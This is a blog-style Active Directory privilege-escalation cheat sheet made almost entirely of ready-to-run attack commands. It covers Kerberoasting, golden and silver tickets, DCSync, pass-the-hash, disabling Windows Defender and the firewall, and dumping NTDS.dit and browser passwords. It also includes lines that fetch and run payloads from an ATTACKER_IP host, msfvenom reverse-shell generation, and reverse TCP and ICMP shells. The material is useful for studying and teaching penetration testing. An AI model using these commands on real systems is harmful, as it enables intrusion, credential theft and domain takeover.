Active Directory privilege escalation cheat sheet

active directory privilege escalation cheatsheet
Windows-PentestingAD exploitation & Post exploitationAll Blog

Recon

  • # Systeminfo
  • systeminfo
  • hostname
  • # Especially good with hotfix info
  • wmic qfe get Caption,Description,HotFixID,InstalledOn
  • # What users/localgroups are on the machine?
  • net users
  • net localgroups
  • net localgroup Administrators
  • net user morph3
  • # Crosscheck local and domain too
  • net user morph3 /domain
  • net group Administrators /domain
  • # Network information
  • ipconfig /all
  • route print
  • arp -A
  • # To see what tokens we have
  • whoami /priv
  • # Recursive string scan
  • findstr /spin “password” *.*
  • # Running processes
  • tasklist /SVC
  • # Network connections
  • netstat -ano
  • # Search for writeable directories
  • dir /a-r-d /s /b
  • ### Some good one-liners
  • # Obtain the path of the executable called by a Windows service (good for checking Unquoted Paths):
  • sc query state= all | findstr “SERVICE_NAME:” >> a & FOR /F “tokens=2 delims= ” %i in (a) DO @echo %i >> b & FOR /F %i in (b) DO @(@echo %i & @echo ——— & @sc qc %i | findstr “BINARY_PATH_NAME” & @echo.) & del a 2>nul & del b 2>nul

Elevation of Privileges

     General

  • # PowerShellMafia
  • # Use always dev branch others are shit.
  • https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
  • powershell.exe -c “Import-Module C:\Users\Public\PowerUp.ps1; Invoke-AllChecks”
  • powershell.exe -c “Import-Module C:\Users\Public\Get-System.ps1; Get-System”
  • # Sherlock
  • https://github.com/rasta-mouse/Sherlock
  • # Unquoted paths
  • wmic service get name,displayname,pathname,startmode |findstr /i “Auto” |findstr /i /v “C:\Windows\\” |findstr /i /v

     Kerberoast

Simple logic for kerberoast is requesting tickets and cracking them(offline, doesn’t produce any logs)
– For kerberos to work, times have to be within 5 minutes between attacker and victim.

  • # Rubeus
  • .\.rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234
  • # List available tickets
  • setspn.exe -t evil.corp -q */*
  • powershell.exe -exec bypass -c “Import-Module .\GetUserSPNs.ps1”
  • cscript.exe GetUserSPNs.ps1
  • # List cached tickets
  • Invoke-Mimikatz -Command ‘”kerberos::list”‘
  • powershell.exe -c “klist”
  • powershell.exe -c “Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command ‘”kerberos::list”‘”
  • # Request tickets
  • Add-Type -AssemblyName System.IdentityModel
  • New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “HTTP/web01.medin.local”
  • # Requesting remotely
  • python GetUserSPNs.py -request ECORP/morph3:supersecurepassword@127.0.0.1
  • # Extract tickets
  • powershell.exe -c “Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat”
  • Invoke-Mimikatz -Command ‘”kerberos::list /export”‘
  • # Crack Tickets
  • python tgsrepcrack.py /usr/share/wordlists/rockyou.txt ticket.kirbi

     Juicy Potato

https://github.com/ohpe/juicy-potato/releases
Pick one CLSID from here according to your system
https://github.com/ohpe/juicy-potato/tree/master/CLSID
Required tokens :-

SeAssignPrimaryTokenPrivilege

SeImpersonatePrivilege 
  • C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a “/c whoami > C:\Users\Public\morph3.txt” -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}

      Stored Credential

  • # To check if there is any stored keyscmdkey /list
  • # Using them
  • runas /user:administrator /savecred “cmd.exe /k whoami”

      Impersonating Tokens with meterpreter

  1. use incognito
  2. list_tokens -u
  3. impersonate_token NT-AUTHORITY\System

Lateral Movement

PsExec, SmbExec, WMIExec, RDP, PTH in general.
WinRM is always good. Check groups carefully.
Since windows gave support to OpenSSH we should also consider SSH.

     Mimikatz Ticket PTH

  1. Enable-PSRemoting
  2. mimikatz.exe ‘” kerberos:ptt C:\Users\Public\ticketname.kirbi”‘ “exit”
  3. Enter-PSSession -ComputerName ECORP

     WinRM

  • $pass = ConvertTo-SecureString ‘supersecurepassword’ -AsPlainText -Force
  • $cred = New-Object System.Management.Automation.PSCredential (‘ECORP.local\morph3’, $pass)
  • Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
  • # Evil-WinRM
  • https://github.com/Hackplayers/evil-winrm
  • ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp

     PTH with Mimikatz

  1. Invoke-Mimikatz -Command ‘”sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command”‘

     Database Links

  • # PowerUpSQL
  • https://github.com/NetSPI/PowerUpSQL
  • Get-SQLServerLink -Instance server -Verbose
  • powershell.exe -c “Import-Module C:\Users\Public\PowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORP\sql”
  • # To see servers
  • select srvname from master..sysservers;
  • # Native
  • Get-SQLServerLinkCrawl -Instance server -Query “exec master..xp_cmdshell ‘whoami'”
  • # Linked database tables
  • select * from openquery(“ECORP\FOO”, ‘select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES’)
  • # You can also use meterpreter module exploit/windows/mssql/mssql_linkcrawler
  • # With meterpreter module you can find linked databases and if you are admin on them
  • # You can do a query and try to enable xp_cmpshell on that server
  • select * from openquery(“server”,’select * from master..sysservers’) EXECUTE AS USER = ‘internal_user’ (‘sp_configure “xp_cmdshell”,1;reconfigure;’) AT “server”

Golden and Silver Tickets

Keys depend of ticket :
–> for a Golden, they are from the krbtgt account;
–> for a Silver, it comes from the “computer account” or “service account”.

  • # Golden Ticket
  • # Extract the hash of the krbtgt user
  • lsadump::dcsync /domain:evil.corp /user:krbtgt
  • lsadump::lsa /inject
  • lsadump:::lsa /patch
  • lsadump::trust /patch
  • # creating the ticket
  • # /rc4 or /krbtgt – the NTLM hash
  • # /sid you will get this from krbtgt dump
  • # /ticket parameter is optional but default is ticket.kirbi
  • # /groups parameter is optional but default is 513,512,520,518,519
  • # /id you can fake users and supply valid Administrator id
  • kerberos::golden /user:morph3 /domain:evil.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519
  • kerberos::ptt golden.tck # you can also add /ptt at the kerberos::golden command
  • # After this , final ticket must be ready
  • # You can now verify that your ticket is in your cache
  • powershell.exe -c “klist”
  • # Verify that golden ticket is working
  • dir \\DC\C$
  • psexec.exe \\DC cmd.exe
  • # Purge the currently cached kerberos ticket
  • kerberos::purge
  • #metasploit module can also be used for golden ticket, it loads the ticket into given session
  • post/windows/escalate/golden_ticket
  • # Silver Ticket
  • # Silver Ticket allows escalation of privileges on DC
  • # /target t he server/computer name where the service is hosted (ex: share.server.local, sql.server.local:1433, …)
  • # /service – The service name for the ticket (ex: cifs, rpcss, http, mssql, …)
  • # Examples
  • kerberos::golden /user:morph3 /domain:domain /sid:domain-sid /target:evilcorp-sql102.evilcorp.local.1433 /service:MSSQLSvc /rc4:service-hash /ptt /id:1103
  • sqlcmd -S evilcorp-sql102.evilcorp.local
  • select SYSTEM_USER;
  • GO
  • kerberos::golden /user:JohnDoe /id:500 /domain:targetdomain.com /sid:S-1-5-21-1234567890-123456789-1234567890 /target:targetserver.targetdomain.com /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt

AD Attacks

     Enumeration

  1. # Basic ldap enumeration
  2. enum4linux -a 192.168.1.2
  3. python windapsearch.py -u morph3 -p morph3 -d evil.corp –dc-ip 192.168.1.2
  4. python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd

     Bruteforce on ldap

  • # Password spray
  • https://github.com/dafthack/DomainPasswordSpray
  • Import-Module .\DomainPasswordSpray.ps1
  • Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
  • # Password brute
  • ./kerbrute_linux_amd64 bruteuser -d evil.corp –dc 192.168.1.2 rockyou.txt morph3
  • # Username brute
  • ./kerbrute_linux_amd64 userenum -d evil.corp –dc 192.168.1.2 users.txt
  • # Password spray
  • ./kerbrute_linux_amd64 passwordspray -d evil.corp –dc 192.168.1.2 users.txt rockyou.txt

     DC Shadow

AD MEM

DC Shadow attack aims to inject malicious Domain Controllers into AD infrastructure so that we can dump actual AD members.

  • #Find sid for that user
  • wmic useraccount where (name=’administrator’ and domain=’%userdomain%’) get name,sid
  • #This will create a RPC Server and listen
  • lsadump::dcshadow /object:”CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local” /attribute:sidhistory /value:sid
  • # Run this from another mimikatz
  • lsadump::dcshadow /push
  • # After this unregistration must be done
  • # Relogin
  • lsadump::dcsync /domain:ECORP.local /account:krbtgt
  • # Now you must have krbtgt hash
  • https://attack.stealthbits.com/how-dcshadow-persistence-attack-works

     DC Sync

  • #####
  • lsadump::dcsync /domain:domain /all /csv
  • lsadump::dcsync /user:krbtgt
  • #####
  • https://gist.github.com/monoxgas/9d238accd969550136db
  • powershell.exe -c “Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat”
  • #####
  • python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
  • python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL

Bypass-Evasion Techniques

     Powershell Constrained Language Bypass

  1. powershell.exe -v 2 -ep bypass -command “IEX (New-Object Net.WebClient).DownloadString(‘http://ATTACKER_IP/rev.ps1’)
  2. PSByPassCLM
  3. powershell.exe -exec bypass -c

     Windows Defender

  1. sc config WinDefend start= disabled
  2. sc stop WinDefend
  3. # Powershell
  4. Set-MpPreference -DisableRealtimeMonitoring $true
  5. # Remove definitions
  6. “%Program Files%\Windows Defender\MpCmdRun.exe” -RemoveDefinitions -All

     Firewall

  1. Netsh Advfirewall show allprofiles
  2. NetSh Advfirewall set allprofiles state off

     Ip Whitelisting

  1. New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP

     Applocker ByPass

  1. https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
  2. https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
  3. https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
  4. # Multistep process to bypass applocker via MSBuild.exe:
  5. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.56 LPORT=9001  -f csharp -e x86/shikata_ga_nai -i  > out.cs
  6. # Replace the buf-sc and save it as out.csproj
  7. https://raw.githubusercontent.com/3gstudent/msbuild-inline-task/master/executes%20shellcode.xml
  8. Invoke-WebRequest “http://ATTACKER_IP/payload.csproj” -OutFile “out.csproj”; C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\out.csproj
  9. # or you can simply use my tool 🙂
  10. https://github.com/morph3/Msbuild-payload-generator
  11. sudo python msbuild_gen.py -a x86 -i 10 –lhost 192.168.220.130 –lport 9001 -m

     GreatSCT

  1. # This also needs Veil-Framework
  2. python GreatSCT.py –ip 192.168.1.56 –port 443 -t Bypass -p installutil/powershell/script.py -c “OBFUSCATION=ascii SCRIPT=/root/script.ps1”
  3. C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false payload1.exe
  4. python3 GreatSCT.py -t Bypass -p regasm/meterpreter/rev_tcp –ip 192.168.1.56 –port 9001
  5. C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U payload.dll

     EvilSalsa

  1. #Preparing payloads
  2. python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt
  3. EncrypterAssembly.exe EvilSalsa.dll supersecretpass123 evilsalsa.dll.txt
  4. #Executing payload
  5. SalseoLoader.exe password http://ATTACKER_IP/evilsalsa.dll.txt reversetcp ATTACKER_IP 9001
  6. # Reverse icmp shell
  7. python icmpsh_m.py “ATTACKER_IP” “VICTIM_IP”
  8. SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ATTACKER_IP

Miscellaneous

     Changing Permissions of a file

  1. icacls text.txt /grant Everyone:F

     Downloading files

  1. IEX (New-Object System.Net.WebClient).DownloadString(“http://ATTACKER_IP/rev.ps1”)
  2. (New-Object System.Net.WebClient).DownloadFile(“http://ATTACKER_SERVER/malware.exe”, “C:\Windows\Temp\malware.exe”) 
  3. Invoke-WebRequest “http://ATTACKER_SERVER/malware.exe” -OutFile “C:\Windows\Temp\malware.exe” 
  4. certutil.exe -urlcache -split -f “http://127.0.0.1:80/shell.exe” shell.exe

     Adding user to Domain admins

  1. Add-DomainGroupMember -Identity ‘Domain Admins’ -Members morph3 -Verbose

      Base64 Encode-Decode

  1. certutil -decode foo.b64 foo.exe
  2. certutil -encode foo.exe foo.b64

      Network sharing

  1. # Local share
  2. net share
  3. wmic share get /format:list
  4. # Remote share
  5. net view
  6. net view \\dc.ecorp.foo /all
  7. wmic /node: dc.ecorp.foo share get
  8. # Mounting share
  9. net use Z: \\127.0.0.1\C$ /user:morph3 password123

      Port Forwarding

  1. # Port forward using plink
  2. plink.exe -l morph3 -pw pass123 192.168.1.56 -R 8080:127.0.0.1:8080
  3. # Port forward using meterpreter
  4. portfwd add -l attacker-port -p victim-port -r victim-ip
  5. portfwd add -l 3306 -p 3306 -r 192.168.1.56

      Powershell Portscan

  1. 0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(VICTIM_IP,$_)) “Port $_ is open!”} 2>$null

      Recovering Powershell Secure String

  1. ######
  2. $user = “morph3”
  3. $file = “morph3-pass.xml”
  4. $cred= New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, (Get-Content $file | ConvertTo-SecureString)
  5. Invoke-Command -ComputerName ECORP -Credential $cred -Authentication credssp -ScriptBlock { whoami }
  6. ######
  7. [System.Runtime.InteropServices.marshal]::PtrToStringAuto([System.Runtime.InteropServices.marshal]::SecureStringToBSTR(“string”))
  8. ######
  9. $Ptr = [System.Runtime.InteropServices.Marshal]::SecureStringToCoTaskMemUnicode($password)
  10. $result = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($Ptr)
  11. [System.Runtime.InteropServices.Marshal]::ZeroFreeCoTaskMemUnicode($Ptr)
  12. $result

      Injecting PowerShell scripts Into sessions

  1. Invoke-Command -FilePath scriptname -Sessions $sessions
  2. Enter-PSSession -Session $sess

      Enable RDP

  1. # CMD
  2. reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v UserAuthentication /t REG_DWORD /d 0 /f
  3. # Powershell
  4. Set-ItemProperty -Path ‘HKLM:\System\CurrentControlSet\Control\Terminal Server’-name “fDenyTSConnections” -Value 0
  5. Enable-NetFirewallRule -DisplayGroup “Remote Desktop”
  6. # Optional
  7. net localgroup “Remote Desktop Users” morph3 /add
  8. # Reruling firewall
  9. netsh advfirewall firewall set rule group=”remote desktop” new enable=Yes
  10. netsh advfirewall firewall add rule name=”allow RemoteDesktop” dir=in protocol=TCP localport=3389 action=allow

      Decrypting EFS files with Mimikatz

Follow the link here How to Decrypt EFS Files

  1. privilege::debug
  2. token::elevate
  3. crypto::system /file:”C:\Users\Administrator\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\thecert” /export
  4. dpapi::capi /in:”C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id”
  5. # Clear text password
  6. dpapi::masterkey /in:”C:\Users\Administrator\AppData\Roaming\Microsoft\Protect\SID\masterkey” /password:pass123
  7. # After this command you must have the exported .der and .pvk files
  8. dpapi::capi /in:”C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\SID\id” /masterkey:f2c9ea33a990c865e985c496fb8915445895d80b
  9. openssl x509 -inform DER -outform PEM -in blah.der -out public.pem
  10. openssl rsa -inform PVK -outform PEM -in blah.pvk -out private.pem
  11. openssl pkcs12 -in public.pem -inkey private.pem -password pass:randompass -keyex -CSP “Microsoft Enhanced Cryptographic Provider v1.0” -export -out cert.pfx
  12. # Import the certificate
  13. certutil -user -p randompass -importpfx cert.pfx NoChain,NoRoot
  14. type “C:\Users\Administrator\Documents\encrypted.txt”

Post exploitation – information gathering

      Reading Event Logs

User must be in “Event Log Reader” group
Follow this link

  1. Get-WinEvent -ListLog *
  2. # Listing logs of a specific user
  3. $cred = Get-Credentials
  4. Get -WinEvent -ListLog * -ComputerName AD1 -Credentials $cred
  5. # Reading Security logs
  6. (Get-WinEvent -FilterHashtable @{LogName = ‘Security’} | Select-Object @{name=’NewProcessNam
  7. e’;expression={ $_.Properties[5].Value }}, @{name=’CommandLine’;expression={
  8. $_.Properties[8].Value }}).commandline

      Password Dump

  1. # Metasploit
  2. post/windows/gather/enum_chrome
  3. post/multi/gather/firefox_creds
  4. post/firefox/gather/cookies
  5. post/firefox/gather/passwords
  6. post/windows/gather/forensics/browser_history
  7. post/windows/gather/enum_putty_saved_sessions
  8. # Empire
  9. collection/ChromeDump
  10. collection/FoxDump
  11. collection/netripper
  12. credentials/sessiongopher
  13. # mimikatz
  14. privilege::debug
  15. sekurlsa::logonpasswords

      Shadow copy

There might be a case where you are privileged but can’t read-access to shadow files(NTDS.dit, SYSTEM etc.)

  1. diskshadow.exe
  2. set context persistent nowriters
  3. add volume C: alias morph3
  4. create
  5. expose %morph3% Z:
  6. # Deletion
  7. delete shadows volume %morph3%
  8. reset

      NTDS.dit dump

  1. secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result local
  2. python crackmapexec.py 192.168.1.56 -u morph3 -p pass1234 -d evilcorp.com –ntds drsuapi
  3. # on DC, lsass.exe can dump hashes
  4. lsadump::lsa /inject

Summary of tools

      Ad Environment

icebreaker
bloodhound

      Post Exploitation

Empire
DeathStar
CrackMapExec – CME
Covenant
Rubeus
SharpDPAPI

      Bypass

Ebowla
Veil-Framework
PsBypassCLM

      Swiss Knife

impacket

Leave a Reply

Your email address will not be published. Required fields are marked *